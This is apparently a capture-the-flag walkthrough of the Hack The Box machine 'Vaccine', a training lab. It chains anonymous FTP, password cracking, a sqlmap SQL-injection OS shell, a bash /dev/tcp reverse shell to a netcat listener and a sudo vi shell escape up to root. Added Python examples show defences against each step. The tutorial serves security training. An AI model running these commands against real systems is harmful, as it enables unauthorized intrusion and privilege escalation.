


As usual let's start with nmap:

nmap -sV -sC IP

Replace IP with the IP address of your target machine (Vaccine).

The IP addresses of the target machines change regularly, so make sure you type the correct one. You can find it on your Hack The Box account.

We can see that port 21, which is associated with FTP, is open and that anonymous FTP login is allowed, so let's try that.


When prompted for a username, type anonymous and press enter

You will now be prompted to enter the password

For the password just press enter.

We have now successfully logged in using anonymous as the username and with no password!



We can see that there is a file called Let's try to download it to our VM using:


The zip file should now be saved on your VM. Just go to your home directory

We collected what we needed so we can now exit the ftp session by typing:


Let's now open a new command prompt window and type:


Let's now try to unzip the zip file by typing:


It is asking for a password to unzip the file. Just press enter

We do not have the password, but let's use John The Ripper to crack it.

If you are not familiar with John The Ripper, or if you need a quick refresher, check out my short post on the basics before continuing.

zip2john > hash.txt

john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt hash.txt

john --show hash.txt

We cracked the password! The password is 741852963

Now let's try to unzip it again.


Type in the password:


and press enter

The zip file contained 2 files:

index.php and style.css

Let's check them out:

cat index.php

Looks like we found some credentials! Username admin and its password hash


We can use Crackstation at to find out the password:

- Copy the hash we just found 2cb42f8734ea607eefed3b70af13bbd3

- Paste it into the password hash cracker

- Tick I'm not a robot

- Click on Crack Hashes

We cracked the password!

The password is qwerty789
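Why a lookup service recovers this password instantly, and what storing it properly looks like, as an added example (not code from the target or from this walkthrough). It assumes the 32-character digest above is unsalted MD5, which the page does not state; the wordlist and function names are constructed for illustration.

```python
import hashlib
import hmac
import os

# Hash shown on the page for the admin account (from index.php).
PAGE_HASH = "2cb42f8734ea607eefed3b70af13bbd3"

# Constructed stand-in for a public wordlist or lookup service.
WORDLIST = ["123456", "password", "letmein", "qwerty789", "dragon"]


def build_md5_table(words):
    """Precompute digest -> plaintext once. Without a salt the same table
    works against every account on every site that uses plain MD5."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def hash_password(password, salt=None):
    """Salted, memory-hard storage: returns (salt, digest) using scrypt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest


def verify_password(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    table = build_md5_table(WORDLIST)
    # Under the MD5 assumption, a dictionary lookup is all it takes.
    print("unsalted lookup:", table.get(PAGE_HASH))
    salt_a, rec_a = hash_password("qwerty789")
    salt_b, rec_b = hash_password("qwerty789")
    # Random salts make identical passwords produce unrelated records,
    # so no precomputed table applies.
    print("records differ:", rec_a != rec_b)
    print("verify:", verify_password("qwerty789", salt_a, rec_a))
```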

When we ran our nmap scan earlier, we also found that port 80, which is associated with HTTP, was open. So let's open a new browser window from our VM to check it out by typing in the URL bar:

We are asked for some credentials to login. We just found the following credentials so let's try that:

Username: admin

Password: qwerty789

and click on Sign In

We are in!


The website holds a Car Catalogue. Note the url is

Now let's try to look for a specific car name. In the search field, type the word Sandy for instance and press enter.

We can now see the url changed to

We can test it out with a few different searches, but it looks like there is a query that uses

?search= followed by whatever we typed in the search bar.

This might be connected with a database... Let's use sqlmap to see if it is vulnerable to SQL injections.

First let's find the cookie session.

To do that right click on the page and select Inspect Element

Now click on the tab Storage

The PHPSESSID should be displayed as per below:


Note that your PHPSESSID will be different from mine.

If you are not familiar with sqlmap or if you need a quick refresher, check out my short post on the sqlmap basics before continuing with this machine.

Let's use our sqlmap:

sqlmap --url="" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

We got the shell!
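The root cause behind an injectable search parameter, shown beside its fix, as an added example (not the target's code, which the page does not show). It uses an in-memory SQLite database as a stand-in for the PostgreSQL back end; the table names, rows and function names are constructed.

```python
import sqlite3

# Constructed input: closes the string literal and appends a second SELECT.
INJECTED = "x' UNION SELECT username, secret FROM users --"


def make_db():
    """In-memory catalogue (constructed rows) plus a table that must stay private."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE cars (name TEXT, type TEXT);
        INSERT INTO cars VALUES ('Sandy', 'Sedan'), ('Elixir', 'Sports');
        CREATE TABLE users (username TEXT, secret TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db


def search_vulnerable(db, term):
    """String concatenation: the search term becomes part of the SQL syntax."""
    sql = "SELECT name, type FROM cars WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


def search_parameterized(db, term):
    """Bound parameter: the statement is fixed and the term is only ever data."""
    sql = "SELECT name, type FROM cars WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal search:      ", search_vulnerable(db, "Sandy"))
    # The concatenated query returns rows from a table the page never queries.
    print("vulnerable + input: ", search_vulnerable(db, INJECTED))
    # The bound query looks for a car literally named like the input: no rows.
    print("parameterized:      ", search_parameterized(db, INJECTED))
```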

Now open a brand new command prompt window and type:

nc -lnvp 4444

Now, return to your sqlmap shell and type:

bash -c "bash -i >& /dev/tcp/ 0>&1" 

The IP is the IP of your virtual machine. Your IP will be different from mine. If you don't know the IP of your VM, open a new command prompt window and type ifconfig.

Just press enter

Now let's return to our netcat and we should have a session!

We got the shell! Now let's make the shell stable using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..

cd ..


cat user.txt

You got the flag!


Privilege Escalation

As usual with privilege escalation, let's start with:

sudo -l

It is asking us for the password and we don't have it

Let's try to find the password in the directory /var/www/html

cd /var/www/html


Let's check out dashboard.php

cat dashboard.php | grep password

We found the password for user postgres


We can keep trying from here but the shell might die soon so let's use the credentials we found to ssh into it directly.

Let's open a new command prompt window. We know from the nmap scan at the beginning that port 22, which is associated with ssh, is open. And we now have the credentials for user postgres!

ssh postgres@ is the IP of the target machine. The IP of the target machine changes all the time so yours will be different.



We are now prompted to enter the password for username postgres.

The password is:


We are in!



We can find the user.txt file here too.

sudo -l

Enter the password again


So it seems like we are able to edit pg_hba.conf using the vi text editor. Let's now type:

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

We can escalate our privilege using the following command:

:set shell=/bin/sh 


Now we get the shell!
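A sudoers audit that flags this class of rule, as an added example (not part of the original walkthrough). The sample entries are constructed, with the first modelled on the command run above; the safe variants shown are sudo's NOEXEC tag and sudoedit, and the parser ignores aliases and escaped commas.

```python
import re

# Interactive programs that can start a shell from inside (partial list).
SHELL_ESCAPE = {"vi", "vim", "view", "less", "more", "man", "ed"}

RULE = re.compile(
    r"^(?P<who>\S+)\s+[^=\s]+\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")

# Constructed entries; the first is modelled on the command used on the page.
SAMPLE = """\
Defaults env_reset
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
dba      ALL=(ALL) NOEXEC: /bin/vi /etc/postgresql/11/main/pg_hba.conf
editor   ALL=(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf
"""


def audit_sudoers(text):
    """Return (user, command) pairs that run a shell-escape-capable
    program through sudo without the NOEXEC tag."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        noexec = False
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # Tags (NOEXEC:, NOPASSWD:, ...) prefix a command and carry
            # over to the commands that follow in the same rule.
            while (tag := re.match(r"^([A-Z_]+):\s*", cmd)):
                if tag.group(1) in ("NOEXEC", "EXEC"):
                    noexec = tag.group(1) == "NOEXEC"
                cmd = cmd[tag.end():]
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if binary in SHELL_ESCAPE and not noexec:
                findings.append((m.group("who"), cmd))
    return findings


if __name__ == "__main__":
    for who, cmd in audit_sudoers(SAMPLE):
        print(f"{who}: '{cmd}' allows a shell escape; use sudoedit or NOEXEC")
```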



cd /root


cat root.txt


Congratulations! You got the root flag!
